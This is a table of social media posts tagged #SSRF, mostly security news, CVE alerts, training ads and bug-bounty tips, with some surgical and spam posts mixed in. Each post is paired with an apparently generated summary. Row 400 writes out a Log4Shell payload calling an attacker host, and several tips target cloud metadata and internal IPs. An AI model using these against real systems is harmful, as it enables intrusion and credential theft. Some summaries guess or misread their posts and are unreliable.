| 362 | 2025-05-24 07:43:15 UTC | CWIS Budapest is underway! #chestwallinjury #SSRF @zmbauman @DavidSutori @dotu3535 @sawhitbe | CWIS Budapest is currently happening, focusing on chest wall injuries and SSRF. Participants include @zmbauman, @DavidSutori, @dotu3535, and @sawhitbe. Stay updated on the event by following the hashtag #chestwallinjury and #SSRF. |
| 363 | 2025-05-23 05:38:44 UTC | #Cycatz #cybersecurity SSRF & Account Takeover More... #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #mobilesecurity #emailsecurity #cloudsecurity #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #SSRF #ATO | The content discusses #Cycatz #cybersecurity focusing on Server-Side Request Forgery (SSRF) and Account Takeover (ATO). It also mentions various cybersecurity aspects like cyber attack surface management, dark web monitoring, mobile security, email security, cloud security, risk register, vendor risk management, brand monitoring, and incident reporting. The post seems to highlight the importance of these cybersecurity measures in protecting against threats like SSRF and ATO. |
| 364 | 2025-05-23 05:38:44 UTC | APT Labs Challenge #3 is LIVE! UNC2903: Metadata Abuse via Adminer (SSRF Attack) a FREE hands-on challenge for serious offensive security learners. Access now: #CyberSecurity #SSRF #InfinityLearning #APTChallenge #CyberWarFareLabs #RedTeamOps | APT Labs Challenge #3, UNC2903, focuses on Metadata Abuse via Adminer (SSRF Attack). It is a free hands-on challenge for serious offensive security learners. Participants can access the challenge now. The content emphasizes cybersecurity, SSRF, Infinity Learning, APTChallenge, CyberWarFareLabs, and RedTeamOps. |
| 365 | 2025-05-22 18:33:53 UTC | How is this usually avoided #bugbounty #ssrf #hackerone | The content discusses avoiding security vulnerabilities like Server-Side Request Forgery (SSRF) in bug bounty programs, particularly on platforms like HackerOne. It highlights the importance of preventing such issues and hints at strategies or techniques to mitigate them. The post likely provides insights or tips on how to steer clear of SSRF vulnerabilities in bug bounty programs, emphasizing the significance of security measures in these contexts. |
| 366 | 2025-05-22 16:33:29 UTC | How does your app fetch resources? CWE-918 (SSRF) lets attackers trick your server into fetching malicious URLs putting internal systems at risk. Train your team against SSRF the full CWE Top 25: ow.ly/19kN50VWx1c #CWE #SSRF #appsec #devsecops #cybersecurity | The content highlights the risk of attackers using Server-Side Request Forgery (SSRF) to trick servers into fetching malicious URLs, potentially compromising internal systems. It emphasizes the importance of training teams to defend against SSRF and provides a link to the full CWE Top 25 list for cybersecurity awareness. The post encourages awareness of app security, development operations, and cybersecurity measures. |
| 367 | 2025-05-22 15:38:04 UTC | .svc.cluster.local is the new 169.254.169.254 #bugbounty #ssrf | The content highlights that *.svc.cluster.local is being identified as a new target similar to 169.254.169.254 for bug bounty programs and SSRF (Server-Side Request Forgery) vulnerabilities. This information suggests that *.svc.cluster.local may be exploited in a manner similar to how 169.254.169.254 has been targeted in the past. The post likely contains further details or insights on this emerging issue. |
| 368 | 2025-05-22 13:33:32 UTC | New CVE : CVE-2025-4123 Grafana open redirect XSS/SSRF via path traversal Detect it now with Nuclei template #infosec #cve #nuclei #grafana #ssrf #xss #openredirect | A new CVE, CVE-2025-4123, highlights a vulnerability in Grafana that allows open redirect, XSS, and SSRF via path traversal. The issue can be detected using Nuclei template. The post emphasizes the importance of addressing this security concern in Grafana. #infosec #cve #nuclei #grafana #ssrf #xss #openredirect. |
| 369 | 2025-05-22 08:33:52 UTC | In-depth analysis by @davidbombal of SSRF vulnerabilities and exploitation techniques Shared by Clipsy: #SSRF Vulnerabilities and Exploitation Techniques: An In-Depth Analysis | The content discusses an in-depth analysis by @davidbombal on SSRF vulnerabilities and exploitation techniques. It is shared by Clipsy and focuses on understanding and applying SSRF vulnerabilities. The content likely provides insights, strategies, and practical knowledge related to identifying and exploiting SSRF vulnerabilities in systems or applications. It emphasizes the importance of being informed and proactive in addressing these security risks. |
| 370 | 2025-05-22 04:33:47 UTC | SSRF Hunting 101: Force the server to make requests to internal resources (like localhost or internal IPs) via URL parameters. If it echoes the response you've likely found SSRF! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting by manipulating URL parameters to force the server to make requests to internal resources like localhost or internal IPs. If the server echoes the response, it indicates a potential SSRF vulnerability. This technique is essential for identifying security flaws and enhancing web security. #SSRF #WebSecurity. |
| 371 | 2025-05-21 17:28:54 UTC | Lorenzo Gallegos presents 'How to Write Secure Code' July 25th at Nebraska.Code(). #SecureCode #OWASP #SQLi #XSS #CSRF #SSRF #Nebraska #TechConf @Mattermost @Bluum_Tech @PapaJohns @scooterscoffee @Runza @HyVee #IT @caseysgenstore @midlandcode @OmahaSSUG | Lorenzo Gallegos will discuss 'How to Write Secure Code' at Nebraska.Code() on July 25th. The presentation will cover topics like #SecureCode, #OWASP, #SQLi, #XSS, #CSRF, and #SSRF. The event is relevant for those interested in IT security and will feature sponsors like @Mattermost, @Bluum_Tech, @PapaJohns, @scooterscoffee, @Runza, @HyVee, @caseysgenstore, @midlandcode, and @OmahaSSUG. Attendees can gain insights into writing secure code and network with industry professionals. |
| 372 | 2025-05-21 17:28:52 UTC | Lorenzo Gallegos presents 'How to Write Secure Code' July 25th at Nebraska.Code(). #SecureCode #OWASP #SQLi #XSS #CSRF #SSRF #Nebraska #TechnologyConference @605SQL @blendtweets @bankeasy_FBT @DEFCON402 @OmahaMakerGroup @wedontcoast @Ameritas | Lorenzo Gallegos will be presenting 'How to Write Secure Code' at Nebraska.Code() on July 25th. The event will cover topics such as secure coding practices, OWASP, SQLi, XSS, CSRF, and SSRF. The presentation will take place at a technology conference in Nebraska, with various organizations tagged in the announcement. Attendees can expect insights on writing secure code and protecting against common vulnerabilities. |
| 373 | 2025-05-21 05:28:07 UTC | #Cycatz #cybersecurity Full-Blown SSRF More... shorturl.at/XpwHj #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #emailsecurity #cloudsecurity #governanceriskcompliance #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #ssrf | The content discusses various cybersecurity topics including SSRF, cyber attack surface management, dark web monitoring, email security, cloud security, governance risk compliance, risk register, vendor risk management, brand monitoring, and incident reporting. It emphasizes the importance of these aspects in maintaining cybersecurity and provides a link for further information. |
| 374 | 2025-05-17 16:13:41 UTC | @niksthehacker used the built-in screenshot generation to trigger SSRF and redirected the target to a crafted domain that captured internal data as a screenshot. #BugBounty #BBV #DEFCON #AWS #SSRF | @niksthehacker leveraged the built-in screenshot feature to exploit SSRF, redirecting the target to a controlled domain to capture sensitive internal data as a screenshot. This technique was used in a bug bounty scenario and shared on social media with relevant hashtags like #BugBounty, #BBV, #DEFCON, #AWS, and #SSRF. |
| 375 | 2025-05-17 04:13:15 UTC | SSRF Hunting 101: Spot SSRF by manipulating URLs & parameters! Try injecting internal IPs (127.0.0.1 169.254.169.254) or internal hostnames where the server fetches data. See what secrets you can grab! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting techniques. It suggests manipulating URLs and parameters to identify SSRF vulnerabilities by injecting internal IPs (127.0.0.1, 169.254.169.254) or internal hostnames. The goal is to uncover secrets by exploiting SSRF. The post emphasizes the importance of web security and provides a link for further information. |
| 376 | 2025-05-16 22:13:04 UTC | SonicWall confirmed a Server-Side Request Forgery (SSRF) vulnerability using encoded URLs. It affects SMA 1000 devices (including 6210 7200 7210 8200v and CMS). #SonicWall #SSRF | SonicWall has confirmed a Server-Side Request Forgery (SSRF) vulnerability using encoded URLs affecting SMA 1000 devices (including 6210, 7200, 7210, 8200v, and CMS). This vulnerability poses a security risk. #SonicWall #SSRF. |
| 377 | 2025-05-16 21:13:29 UTC | Urgent: SonicWall SMA1000 series vulnerability (CVE-2025-40595) allows remote exploitation via encoded URLs. Update firmware to 12.4.3-02963 immediately. #CyberSecurity #SonicWall #SSRF thedailytechfeed.com/critical-vulne | An urgent vulnerability (CVE-2025-40595) in SonicWall SMA1000 series allows remote exploitation via encoded URLs. Immediate action is needed to update firmware to version 12.4.3-02963 to mitigate the risk. This issue highlights the importance of cybersecurity measures and protection against Server-Side Request Forgery (SSRF) attacks. For more information, visit thedailytechfeed.com/critical-vulne. |
| 378 | 2025-05-16 18:13:46 UTC | 2/2 \| Check it out here: tryhackme.com/room/ssrfqi?ut #tryhackme via @RealTryHackMe #ssrf #hacksei | The content is promoting a room on TryHackMe related to Server-Side Request Forgery (SSRF) with a shortened link provided. It encourages users to check it out on the TryHackMe website. The post includes hashtags for TryHackMe, SSRF, and Hacksei. The content is shared via the RealTryHackMe Twitter account. |
| 379 | 2025-05-16 18:13:46 UTC | 1/2 \| Happy to complete the #SSRF vuln room on #tryhackme. MAN I LOVE THIS ROOM! I mean I've a long road ahead but I WILL MASTER THIS VULN! Lessons Learned: 1. Types of SSRF. 2. Ways to find SSRF vulns. 3. SSRF defends & ways to bypass them. 4. Deny/Allow List Open Redirect. | The content discusses completing an SSRF vulnerability room on TryHackMe, expressing enthusiasm and determination to master the vulnerability. Key takeaways include learning about types of SSRF, methods to identify SSRF vulnerabilities, defenses against SSRF attacks, and ways to bypass them. Additionally, it mentions Deny/Allow List and Open Redirect as important concepts. The individual is excited about the progress made and the knowledge gained in this area of cybersecurity. |
| 380 | 2025-05-16 12:13:19 UTC | SSRF hunting? Force your server to make requests to internal resources (like localhost or internal IPs) via manipulated URLs/parameters. If it echoes back you've likely found a vulnerability! #SSRF #WebSec | This content discusses SSRF (Server-Side Request Forgery) hunting by manipulating URLs/parameters to force a server to make requests to internal resources like localhost or internal IPs. If the server echoes back the requested information, it may indicate a vulnerability. The post emphasizes the importance of testing for SSRF vulnerabilities in web security. #SSRF #WebSec. |
| 381 | 2025-05-16 10:02:27 UTC | SonicWall SMA1000 Vulnerability Let Attackers to Exploit Encoded URLs To Gain Internal Systems Access Remotely | A vulnerability in SonicWall SMA1000 allows attackers to exploit encoded URLs, gaining remote access to internal systems. This security flaw poses a risk of unauthorized access and potential data breaches. Organizations using SonicWall SMA1000 should be aware of this issue and take necessary precautions to protect their systems and data from exploitation. Regular security updates and patches should be applied to mitigate the risk of such vulnerabilities being exploited by malicious actors. |
| 382 | 2025-05-15 05:13:23 UTC | #Cycatz #cybersecurity Exceptional SSRF Finding More... #cyberattacksurfacemanagement #SurfaceWebMonitoring #mobilesecurity #emailsecurity #cloudsecurity #governanceriskcompliance #riskregister #vendorriskmanagement #brandmonitoring #incedentreport #SSRF | The content discusses an exceptional Server-Side Request Forgery (SSRF) finding related to cybersecurity. It also mentions various cybersecurity topics such as cyber attack surface management, web monitoring, mobile security, email security, cloud security, governance risk compliance, risk register, vendor risk management, brand monitoring, and incident reporting. The content seems to emphasize the importance of SSRF and various cybersecurity measures. |
| 383 | 2025-05-13 13:04:00 UTC | Server-Side Request Forgery (SSRF) A web app flaw where servers are tricked into making internal requests via user input exposing sensitive systems. #azefox #azefoxinnovations #CyberSecurity #SSRF #WebSecurity #InfoSec #EthicalHacking | The content discusses Server-Side Request Forgery (SSRF), a web app vulnerability where servers are manipulated into making internal requests through user input, potentially revealing sensitive systems. The post emphasizes the importance of cybersecurity, web security, and ethical hacking in addressing SSRF risks. The hashtags #azefox, #azefoxinnovations, #CyberSecurity, #SSRF, #WebSecurity, #InfoSec, and #EthicalHacking are used to categorize and promote the content. |
| 384 | 2025-05-13 07:58:20 UTC | New Blog Alert! Learn the Best 7 Ways to Prevent SSRF Vulnerability in React.js with real-world coding examples security tips. Read more: #ReactJS #CyberSecurity #WebSecurity #SSRF #JavaScript #OWASP #InfoSec #DevSecOps #WebDev #Pentesting #AppSec | A new blog discusses 7 ways to prevent SSRF vulnerability in React.js with coding examples and security tips. The content covers React.js security measures, real-world coding practices, and tips to enhance web security. The blog addresses SSRF vulnerability prevention, JavaScript security, OWASP guidelines, information security, DevSecOps practices, web development, pentesting, and application security. Readers can find detailed insights and recommendations on safeguarding React.js applications against SSRF threats. |
| 385 | 2025-05-12 20:58:27 UTC | Finally got this one published! #cwis #ssrf | The author is excited to announce the publication of their work, using hashtags #cwis and #ssrf. The link provided likely directs to the published content. |
| 386 | 2025-05-12 19:58:52 UTC | Frankenplating at cwis! #cwis #ssrf #ribs | The content mentions "Frankenplating at cwis" and includes hashtags like #cwis, #ssrf, and #ribs. It seems to refer to a topic related to combining different elements or components, possibly in a creative or unconventional way. The link provided may lead to more detailed information on the topic. |
| 387 | 2025-05-12 07:58:43 UTC | New Writeup Alert! "SSRF via PDF Generator? Yes and It Led to EC2 Metadata Access" by Abhijeet Kumawat is now live on IW! Check it out here: #infosec #hacking #ssrf #bugbounty #ssrfattack | Abhijeet Kumawat's new writeup on SSRF via a PDF generator leading to EC2 metadata access is now live on IW. The content discusses a security vulnerability related to SSRF attacks. It highlights the potential risks and implications of exploiting this vulnerability. Readers interested in information security, hacking, bug bounty programs, and SSRF attacks can find valuable insights in the writeup. The link provided directs users to the detailed content for further exploration. |
| 388 | 2025-05-10 12:53:17 UTC | A critical SSRF flaw in Microsoft Power Apps (CVE-2025-47733) puts internal data at risk. No auth needed. High CVSS: 9.1. Read how to protect your org now: #CyberSecurity #SSRF #Microsoft #InfoSec | A critical SSRF flaw in Microsoft Power Apps (CVE-2025-47733) poses a high risk to internal data without authentication. The vulnerability has a CVSS score of 9.1, emphasizing its severity. Organizations are urged to take immediate steps to protect their data and systems against potential exploitation. The content highlights the importance of cybersecurity measures and provides guidance on safeguarding against SSRF vulnerabilities in Microsoft products. #CyberSecurity #SSRF #Microsoft #InfoSec. |
| 389 | 2025-05-08 10:28:22 UTC | Completed Server-Side Vulnerabilities Learning Path at PortSwigger Thrilled to finish PortSwigger's Server-Side Vulnerabilities path gaining insight into web system exploits. #WebSecurity #CyberSec #PortSwigger #Learning #SQLInjection #SSRF #Auth #Vulns | The content highlights the completion of the Server-Side Vulnerabilities Learning Path at PortSwigger, expressing excitement at gaining insights into web system exploits like SQL injection, SSRF, and authentication vulnerabilities. The individual is thrilled to finish the learning path and shares hashtags related to web security, cybersecurity, learning, and PortSwigger. |
| 390 | 2025-05-07 04:23:13 UTC | SSRF hunting? Try manipulating URLs the server fetches! Look for input fields that dictate server-side requests (e.g. image URLs file imports). Can you make it access internal resources or external sites? #SSRF #WebSecurity | The content discusses SSRF hunting by manipulating URLs that servers fetch. It suggests looking for input fields controlling server-side requests like image URLs or file imports. The goal is to see if these manipulations can access internal resources or external sites, emphasizing the importance of web security. The content encourages exploring these techniques for identifying and mitigating SSRF vulnerabilities. |
| 391 | 2025-05-06 16:18:31 UTC | Day 21/30 Web Fundamentals File Inclusion Intro to SSRF Tough but rooms today! Hands-on with LFI RFI & internal web request attacks. Learning never stops on @TryHackMe #TryHackMe #WebHacking #CyberSecurity #Day21 #SSRF #FileInclusion #InfoSec #THM #LearningInPublic | Day 21/30 of Web Fundamentals covers File Inclusion and an introduction to SSRF. Participants engage in challenging activities involving LFI, RFI, and internal web request attacks on @TryHackMe. The learning journey continues with a focus on cybersecurity and web hacking. #TryHackMe #CyberSecurity #SSRF #FileInclusion #InfoSec #THM #LearningInPublic. |
| 392 | 2025-05-05 19:14:13 UTC | Hackers are exploiting email input fields to launch XSS SSRF and header injection attacks. Ensure robust validation and sanitization to protect your applications. #CyberSecurity #XSS #SSRF #EmailSecurity thedailytechfeed.com/hackers-exploi | Hackers are targeting email input fields to carry out XSS, SSRF, and header injection attacks. Robust validation and sanitization measures are crucial to safeguard applications. Ensuring proper security protocols can help prevent these cyber threats. #CyberSecurity #XSS #SSRF #EmailSecurity. |
| 393 | 2025-05-05 16:02:02 UTC | Hackers Leveraging Email Input Fields to Exploit Vulnerabilities Ranging from XSS to SSRF | Hackers are exploiting vulnerabilities in email input fields, including cross-site scripting (XSS) and server-side request forgery (SSRF). By manipulating email input fields, attackers can execute malicious code or access sensitive information. These vulnerabilities pose significant risks to organizations and individuals. It is crucial to implement robust security measures to protect against such attacks and regularly update systems to patch any potential vulnerabilities. |
| 394 | 2025-05-05 12:26:17 UTC | Hackers Exploit Email Fields to Launch XSS and SSRF Attacks | Hackers are using email fields to launch XSS (Cross-Site Scripting) and SSRF (Server-Side Request Forgery) attacks. By manipulating email fields, attackers can inject malicious code into websites or trick servers into making unauthorized requests. These attacks can lead to data breaches, unauthorized access, and other security threats. Organizations should implement security measures to protect against these exploits, such as input validation, sanitization of user inputs, and monitoring for suspicious activities in email fields. Vigilance and proactive security measures are crucial to prevent these types of attacks. |
| 395 | 2025-05-05 12:26:15 UTC | New SonicBoom Attack Allows Bypass of Authentication for Admin Access | A new attack called SonicBoom allows bypassing authentication for admin access. The attack exploits vulnerabilities to gain unauthorized access without proper authentication. This security threat poses risks to systems and data integrity by granting unauthorized users admin privileges. It highlights the importance of implementing robust security measures to prevent such attacks and protect sensitive information from unauthorized access. |
| 396 | 2025-05-05 08:18:22 UTC | #TodayILearned #ssrf AI is so good for educating myself: Q: provide SSRF basic example - Server side request forgery A: | The content discusses using AI to learn about SSRF (Server Side Request Forgery). The focus is on educating oneself about SSRF through AI assistance. The post mentions providing a basic example of SSRF and includes a link for further reference: https://ift.tt/oPMUNsT. |
| 397 | 2025-05-04 20:18:11 UTC | Test for SSRF: Can your server be tricked into making requests to internal/external resources you don't intend? Try manipulating URLs/parameters to point to internal IPs (127.0.0.1 192.168.x.x) or your own controlled server. See what happens! #SSRF #WebSecurity | The content discusses testing for Server-Side Request Forgery (SSRF) by manipulating URLs/parameters to make servers unknowingly access internal/external resources. It suggests trying to point requests to internal IPs like 127.0.0.1 or 192.168.x.x, or a controlled server to see if the server can be tricked. This test helps identify vulnerabilities in web security related to SSRF. #SSRF #WebSecurity. |
| 398 | 2025-05-03 20:08:23 UTC | The sneaky vuln letting attackers trick servers into hitting internal resources! Poor input validation (e.g. URLs) can expose databases or localhost. Seen in a form I analyzed, check the pic! Prevent it: validate inputs whitelist domains. Thoughts? #Cybersecurity #SSRF | The content discusses a vulnerability that allows attackers to trick servers into accessing internal resources by exploiting poor input validation, such as URLs. The vulnerability, known as Server-Side Request Forgery (SSRF), can expose databases or localhost. To prevent this, it is recommended to validate inputs and whitelist domains. The post emphasizes the importance of cybersecurity measures to protect against SSRF attacks. |
| 399 | 2025-05-02 09:03:31 UTC | CYBERSECURITY ALERT! Join our FREE class on: OWASP Top 10: SSRF Risks Sat May 3 \| 10AM GMT+1 \| Zoom Trainer: Amos Ologboshere Join: #Cybersecurity #SSRF #OWASP #FreeTraining | A free cybersecurity class on OWASP Top 10: SSRF Risks is being offered on Saturday, May 3 at 10AM GMT+1 via Zoom. The trainer is Amos Ologboshere. The class aims to educate participants on security risks related to Server-Side Request Forgery (SSRF). Interested individuals can join the session by using the provided link. The event is promoted with hashtags #Cybersecurity, #SSRF, #OWASP, and #FreeTraining. |
| 400 | 2025-05-02 01:58:38 UTC | 1/ An attacker sends this to your app: $ {jndi:ldap://attacker.oastify.com} (without the actual space) Your server processes it and, without showing anything, makes an outbound connection. Information leaked without anyone noticing. #Log4Shell #SSRF #BlindRCE | The content warns about a security vulnerability where an attacker can send a malicious payload to a server, causing it to make an external connection without displaying anything, potentially leaking sensitive information. This exploit involves the Log4Shell, SSRF, and BlindRCE techniques. The payload example is $ {jndi:ldap://attacker.oastify.com}. It emphasizes the risk of data leakage without detection. |
| 401 | 2025-04-30 23:04:07 UTC | SSRF in Oracle Services SSRF tricks your backend into leaking internal data. Web3 targets: Oracle price feeds NFT metadata Bridge endpoints Example: ... Exposes cloud creds attacker controls signers or nodes. #SSRF #DeFi | The content discusses Server-Side Request Forgery (SSRF) vulnerabilities in Oracle Services, which can be exploited to leak internal data. Web3 targets such as Oracle price feeds, NFT metadata, and Bridge endpoints are at risk. An example is provided where SSRF exposes cloud credentials, allowing attackers to control signers or nodes. The post emphasizes the importance of addressing SSRF vulnerabilities in the context of decentralized finance (#DeFi). |
| 402 | 2025-04-30 16:53:32 UTC | It was good to use today at last the @CWISociety C-QoL #QualityOfLife Questionnaire for #ChestWallInjury #RibFractures #SSRF. We need to collect #PROMS & #PREMS systematically whilst we continue to explore indications benefits complications and late effects (in this case). | Today, the @CWISociety C-QoL questionnaire was used for Chest Wall Injury, Rib Fractures, and SSRF. The focus is on collecting PROMS & PREMS systematically to understand indications, benefits, complications, and late effects. This data will help in exploring these aspects further. |
| 403 | 2025-04-29 09:58:43 UTC | SSRF Vulnerability in Symfony? Learn how attackers exploit it & how to fix it with real code examples. Boost your web app security now! #CyberSecurity #Symfony #SSRF #WebSecurity #BugBounty #OWASP #DevSecOps #Pentesting #Infosec #SecureCoding | The content discusses the SSRF vulnerability in Symfony, explaining how attackers exploit it and providing solutions with real code examples to enhance web app security. It emphasizes the importance of addressing this vulnerability to protect against cyber threats. The post includes hashtags related to cybersecurity, Symfony, SSRF, web security, bug bounty, OWASP, DevSecOps, pentesting, infosec, and secure coding. It offers a link for further information and encourages readers to take action to secure their web applications. |
| 404 | 2025-04-29 06:53:23 UTC | Advanced SSRF Challenge! Credit - @Cyber__Anna Can you find a way to fetch internal metadata? Drop your bypass tricks in the comments! #SSRF #BugBounty #InfoSec | The content is about an advanced Server-Side Request Forgery (SSRF) challenge posted by @Cyber__Anna. Participants are encouraged to find a method to retrieve internal metadata and share their bypass techniques in the comments. The challenge is related to cybersecurity topics such as SSRF, Bug Bounty, and Information Security. It invites individuals to test their skills in identifying vulnerabilities and bypassing security measures. |
| 405 | 2025-04-28 12:48:36 UTC | SSRF Hunting 101: Force the server to make requests to internal resources or external URLs it shouldn't. Think: localhost internal IPs cloud metadata endpoints. Look for URL parameters and data that control server-side requests. Test test test! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting basics, emphasizing forcing servers to make unauthorized requests to internal or external resources like localhost, internal IPs, and cloud metadata endpoints. It suggests focusing on URL parameters and data that influence server-side requests and emphasizes thorough testing. The post encourages testing for SSRF vulnerabilities to enhance web security. #SSRF #WebSecurity. |
| 406 | 2025-04-28 11:11:14 UTC | How Breaches Start: Breaking Down 5 Real Vulns | The content discusses how data breaches begin by breaking down five real vulnerabilities. It likely explores common weaknesses that cyber attackers exploit to gain unauthorized access to systems or data. Understanding these vulnerabilities can help organizations strengthen their cybersecurity defenses and prevent breaches. The content may provide insights into specific vulnerabilities and offer recommendations on how to mitigate these risks effectively. |
| 407 | 2025-04-26 13:43:18 UTC | My first @CWISociety meeting in the books! Alpacas and my @GWSMHS mentor #CWIS President @saranimd who inspired me to become a trauma surgeon & pursue #SSRF as an option for my patients Celebrating surgical mentorship for all learners Advanced chest wall cadaver course | The content describes attending the first meeting of the CWISociety, where the individual was inspired by their mentor to become a trauma surgeon and explore SSRF for patients. The meeting included discussions on surgical mentorship for learners and participation in an advanced chest wall cadaver course. The post also mentions alpacas and the mentor's influence in shaping the individual's career aspirations. |
| 408 | 2025-04-25 17:51:36 UTC | Critical Commvault SSRF could allow attackers to execute code remotely | A critical Server-Side Request Forgery (SSRF) vulnerability in Commvault software could enable attackers to remotely execute code. This flaw poses a significant security risk as it allows malicious actors to manipulate server requests and potentially gain unauthorized access to systems. Organizations using Commvault software should promptly address this vulnerability to prevent exploitation and unauthorized code execution. |
| 409 | 2025-04-25 08:43:15 UTC | A critical SSRF vulnerability has been found in Moodle 4.4.3 via a TOC-TOU flaw in URL handling. Enables attackers to access internal services & even escalate to RCE. Details threatsbank.com/moodle-ssrf-vu #infosec #Moodle #CyberSecurity #SSRF | A critical SSRF vulnerability in Moodle 4.4.3 allows attackers to access internal services and potentially escalate to Remote Code Execution (RCE) due to a TOC-TOU flaw in URL handling. More information can be found at threatsbank.com/moodle-ssrf-vu. This issue poses a significant threat to information security and highlights the importance of addressing vulnerabilities promptly. #infosec #Moodle #CyberSecurity #SSRF |
| 410 | 2025-04-24 12:33:48 UTC | Smoking Screaming Rubber Fish #SSRF AwiGhAQ8vZsv8ndSv3HCqcLrRh2UWdRXtPpdS8Kxpump Send to millions! | The content promotes the Smoking Screaming Rubber Fish #SSRF with a specific code to send to millions. The link provided directs to further information or promotion related to the product or campaign. |
| 411 | 2025-04-24 11:26:32 UTC | Critical Commvault Command Center Flaw Enables Attackers to Execute Code Remotely | A critical flaw in Commvault Command Center allows attackers to remotely execute code. This vulnerability poses a significant security risk as it can be exploited by malicious actors to compromise systems. Organizations using Commvault Command Center should be aware of this flaw and take immediate action to mitigate the risk of unauthorized code execution on their systems. |
| 412 | 2025-04-22 07:28:17 UTC | A critical #SSRF vulnerability (CVE-2025-29446) found in Open-WebUI v0.5.16 lets attackers manipulate internal requests via malformed URLs. Read how it works and how to patch threatsbank.com/critical-ssrf- #CyberSecurity #OpenWebUI #CVE2025 | A critical SSRF vulnerability (CVE-2025-29446) in Open-WebUI v0.5.16 allows attackers to manipulate internal requests using malformed URLs. The article explains the vulnerability and provides guidance on patching it. For more details, visit threatsbank.com/critical-ssrf-. #CyberSecurity #OpenWebUI #CVE2025. |
| 413 | 2025-04-20 19:13:30 UTC | Ask any Web App pentester: It can be tricky to demonstrate Server-Side Request Forgery (#SSRF) impact. Alex fortunately has a few shortcuts that can help you out as you exploit this vulnerability. Do you have any tips and tricks you use when you find SSRF? Drop them in the | Demonstrating Server-Side Request Forgery (SSRF) impact can be challenging for Web App pentesters. Alex shares shortcuts to exploit this vulnerability effectively. Readers are encouraged to share their own tips and tricks for dealing with SSRF. |
| 414 | 2025-04-19 21:13:21 UTC | Critical Vulnerabilities: HylaFAX RCE, SicommNet SQL Bypass and AutoGPT SSRF #HylaFAX #SicommNet #AutoGPT #RCE #SQLi #SSRF #Sécurité #Vulnérabilité #AI | The content discusses critical vulnerabilities including Remote Code Execution (RCE) in HylaFAX, SQL Bypass in SicommNet, and Server-Side Request Forgery (SSRF) in AutoGPT. These vulnerabilities pose security risks and are tagged with relevant hashtags. The post emphasizes the importance of addressing these vulnerabilities promptly to enhance security. |
| 415 | 2025-04-18 05:04:18 UTC | What is DNS rebinding? Attack methods and countermeasures explained #MynaviNews (Apr 17) #DNSリバインディング #SSRF #セキュリティ対策 #クラウド脅威 #内部ネットワーク保護 | The content discusses DNS rebinding, explaining the attack methods and countermeasures. It covers topics such as DNS rebinding, SSRF, security measures, cloud threats, and internal network protection. The article aims to provide insights into understanding and safeguarding against DNS rebinding attacks. |
| 416 | 2025-04-17 10:04:00 UTC | Hackers exploit SSRF flaws to access AWS EC2 metadata and IAM credentials. Learn how to stay protected - read the full blog for key insights! #Hacked #AWS #SSRF #Codecertificate | Hackers are using Server-Side Request Forgery (SSRF) vulnerabilities to access AWS EC2 metadata and IAM credentials. To protect against this threat, it is important to stay informed and take necessary precautions. The full blog provides key insights on how to safeguard your AWS environment. #Hacked #AWS #SSRF #Codecertificate. |
| 417 | 2025-04-17 05:04:21 UTC | Check out the latest article in my newsletter: API Security Alert: API7:2023 - Server Side Request Forgery (SSRF) linkedin.com/pulse/api-secu via @LinkedIn #owasp #ssrf | The content highlights an API security alert regarding Server Side Request Forgery (SSRF) with the reference API7:2023. The article can be found on LinkedIn and is shared via a newsletter. The post emphasizes the importance of API security and raises awareness about the risks associated with SSRF. The content also includes relevant hashtags like #owasp and #ssrf for visibility and categorization. |
| 418 | 2025-04-16 20:58:25 UTC | We've seen persistence in #CVE202427564 #SSRF probes for vulnerable ChatGPT servers requesting /etc/passwd and URLs using OAST domains. Increase of probes hitting Education (16.6%) and Manufacturing (8%) since Feb 2025. Details at bit.ly/4j5tvwJ | Persistent #CVE202427564 #SSRF probes target vulnerable ChatGPT servers, seeking /etc/passwd and URLs via OAST domains. Probes have surged in Education (16.6%) and Manufacturing (8%) sectors since Feb 2025. More information available at bit.ly/4j5tvwJ. |
| 419 | 2025-04-15 15:58:09 UTC | Warning: 2 high #SSRF & exposure of sensitive info to an unauthorized actor in @Auto_GPT CVE-2025-31490 CVE-2025-31491 CVSS: 8.6-7.5. An attacker can exploit these vulnerabilities to leak auth headers & private cookies. bit.ly/3RlfUFs & bit.ly/3G4YUkb #Patch | Two high-risk SSRF vulnerabilities (CVE-2025-31490, CVE-2025-31491) in @Auto_GPT pose a threat of exposing sensitive information to unauthorized actors, with CVSS scores of 8.6-7.5. Attackers can exploit these flaws to leak authentication headers and private cookies. It is crucial to apply the patch provided to mitigate these risks. |
| 420 | 2025-04-15 15:37:30 UTC | Hackers Exploiting EC2 Instance Metadata Vulnerability to Attacks Websites Hosted | Hackers are targeting websites hosted on Amazon EC2 instances by exploiting a vulnerability in the instance metadata service. This vulnerability allows attackers to gain unauthorized access to sensitive information, potentially leading to website compromise. EC2 users are advised to implement security measures to protect against these attacks, such as restricting access to the metadata service and regularly updating their systems to patch any known vulnerabilities. |
| 421 | 2025-04-15 08:58:18 UTC | Hacking a Go anti-SSRF library #evasión #GO #SSRF #paranoidhttp | The content discusses hacking an anti-SSRF library in Go programming language. It involves evading security measures related to SSRF (Server-Side Request Forgery) using the Go language. The content seems to focus on exploring vulnerabilities and potential exploits in the context of SSRF protection mechanisms. The hashtag references indicate the topics covered in the content, including evasion techniques, Go programming, SSRF vulnerabilities, and paranoid HTTP practices. |
| 422 | 2025-04-14 19:58:21 UTC | 1. First I need to parse the original content. The user's message is about discovering SSRF vulnerabilities using AutoRepeater. The steps are divided into sections: introduction, download/install, automatic discovery and blind SSRF. #ssrf #bugbountytips | The content discusses discovering SSRF vulnerabilities with AutoRepeater in steps: parsing original content, introduction, download/install, automatic discovery, and blind SSRF. It highlights the process and sections involved in identifying SSRF vulnerabilities. The content is tagged with #ssrf and #bugbountytips. |
| 423 | 2025-04-14 17:53:40 UTC | 5. Blind SSRF section is about testing methods. The user encourages fuzzing parameters and persistence. Keep the motivational tone with "bro" as in the original. #ssrf #bugbountytips | The content discusses testing methods for Blind SSRF, emphasizing fuzzing parameters and persistence. It encourages a motivational tone using "bro" and includes hashtags #ssrf and #bugbountytips. |
